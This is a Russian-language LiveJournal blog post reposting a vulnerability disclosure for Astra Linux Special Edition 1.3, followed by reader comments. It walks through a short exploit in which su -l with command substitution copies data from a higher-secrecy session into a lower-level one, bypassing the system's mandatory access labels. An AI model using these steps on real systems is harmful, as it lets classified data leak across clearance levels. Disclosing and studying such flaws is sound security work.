?

Log in

No account? Create an account

Previous Entry | Next Entry

Есть такой дистрибутив линукса Astra Linux Special Edition, который сертифицирован МО РФ, ФСТЕК. И который создается в лучших традициях линуксоидов, виндовых программистов решивших писать под линукс, как под виндовс, ну и специфических реалиях российской оборонки. Понятно что из этого всего что-то нормальное не могло получится. В итоге сделали кучу костылей, вместо того, чтобы доделать уже существующие и надежно работающие решения. В итоге был найден эксплойт для получения доступа к данным различного уровня доступа.

Под катом репост оригинала:

Описание уязвимости

Критическая уязвимость в Astra Linux позволяет пользователю изменять категории мандатного доступа, понижая степень секретности и класс для сведений. Одной из причин описанной проблемы является закрытость проекта и построение велосипедов вместо использования значительно более проверенных и протестированных решений, таких, как SELinux. Для мандатного контроля доступа в Astra Linux используются следующие компоненты: модуль ядра parsecfs, реализующий монтирование файловых систем, видимых пользователям с одинаковым уровнем доступа, аудит действий пользователя и мандатный контроль доступа, юзерспейсный сервис для настройки ядерной части и модули PAM для аутентификации и авторизации пользователей. Идеологически модель, используемая в Astra Linux напоминает модель модель Белла-Лападулы, реализованную в Multi-level security политике SELinux, но имеет одно отличие: пользователю разрешено выбирать при входе в систему, с каким классом и уровнем сведений он желает работать. При обычной работе пользователь даже не видит документы, имеющие другой класс, так как содержимое его домашнего каталога фактически “монтируется” заново при каждом входе в систему. При этом, пользователю по умолчанию разрешено выполнять команду su, причём эта команда, помимо ID пользователя, изменяет и его мандатную метку, а опция -l “перемонтирует” и его домашний каталог.

Эксплоит

1) Создаём юзера, указав ему минимальный уровень доступа 0, а максимальный 1:
level2:0:0:1:0
2) Логинимся от секретного пользователя.

Astra Linux SE 1.3 (smolensk)
tty1
astra login: level2
Secret level [1]: 1

3) Создаём файл с секретными данными

level2@astra~$ echo “secret message” >test.txt

4) Повышаем привиллегии, открываем файл на чтение в старой сессии и скармливаем в новую
level2@astra~$ su -l level2 -c “echo `cat test1.txt` > secret.txt”

5) Проверяем результат, заходим с другим уровнем доступа:
Astra Linux SE 1.3 (smolensk)
tty1
astra login: level2
Secret level [1]: 0

level2@astra~$ cat secret.txt
secret message

Аналогичным образом возможен перенос документов между категориями и различными пользователями. Резюмируя вышесказанное, критическая уязвимость в Astra Linux несёт серьёзную угрозу безопасности органов государственной власти.

Originally published at Werwolf blog's. You can comment here or there.

Comments

( 6 comments — Leave a comment )
majorua
Jun. 28th, 2013 11:11 am (UTC)
во как, ниуя не понял))
Дмитрий Попов
Dec. 1st, 2013 06:18 pm (UTC)
Да....
Уже сколько раз ржу над нашими горе-супер-пупер-программистами. Ещё с МСВС и работы в НИИАПе: начальство само не знает чего оно хочет, в заказчиках сидят абсолютно некомпетентные люди, естественно при зарплатах в таких организациях там нет хороших разработчиков - или студенты, или просто случайные люди... При этом деньги на разработку что ОС, что, например, той же "Ангары", первый полет которой обещали в начале 2000-ых, а давеча ВВП говорил, что это НОВЕЙШИЙ носитель, который скоро полетит (Иванов это говорил в 2005, 2007 и 2009 г.)... Что уж тут грешить на школьника, который аналогично нашим разработчикам создал "принципиально новую ОС"... Он хоть картинки и заставки поменял, собрать смог - для школьника это таки достижение. Но не для огромного, затратного проекта с непредсказуемыми УХУДШЕНИЯМИ по сравнению с исходной платформой.
(Anonymous)
Jul. 9th, 2014 05:15 am (UTC)
Re: Да....
Да что уж говорить.. Национал предатели сейчас достаточно во всех органах власти и чем выше тем больше шанс встретить предателя родины и работают они по назначению которому было создана система новой России советниками США на разрушение России и уничтожения Русских.
Сталин таких предателей расстреливал, а сейчас они занимают начальствующие места!
(Anonymous)
Jan. 9th, 2018 05:43 am (UTC)
Конечно
НЕ, у нас в стране есть хорошие программисты, только они эмигрируют в другую страну, где им за труды платят больше, чем здесь - копейки...
livejournal
Jul. 31st, 2014 06:36 am (UTC)
Astra Linux
Пользователь lumixograf сослался на вашу запись в своей записи «Astra Linux» в контексте: [...] об этой системе, а также в ЖЖ встретил упоминание о ней у : Критическая уязвимость в Astra Linux [...]
(Anonymous)
Jan. 22nd, 2015 11:45 am (UTC)
вранье
( 6 comments — Leave a comment )

Latest Month

August 2018
S M T W T F S
   1234
567891011
12131415161718
19202122232425
262728293031 

Tags

Powered by LiveJournal.com
Designed by Lilia Ahner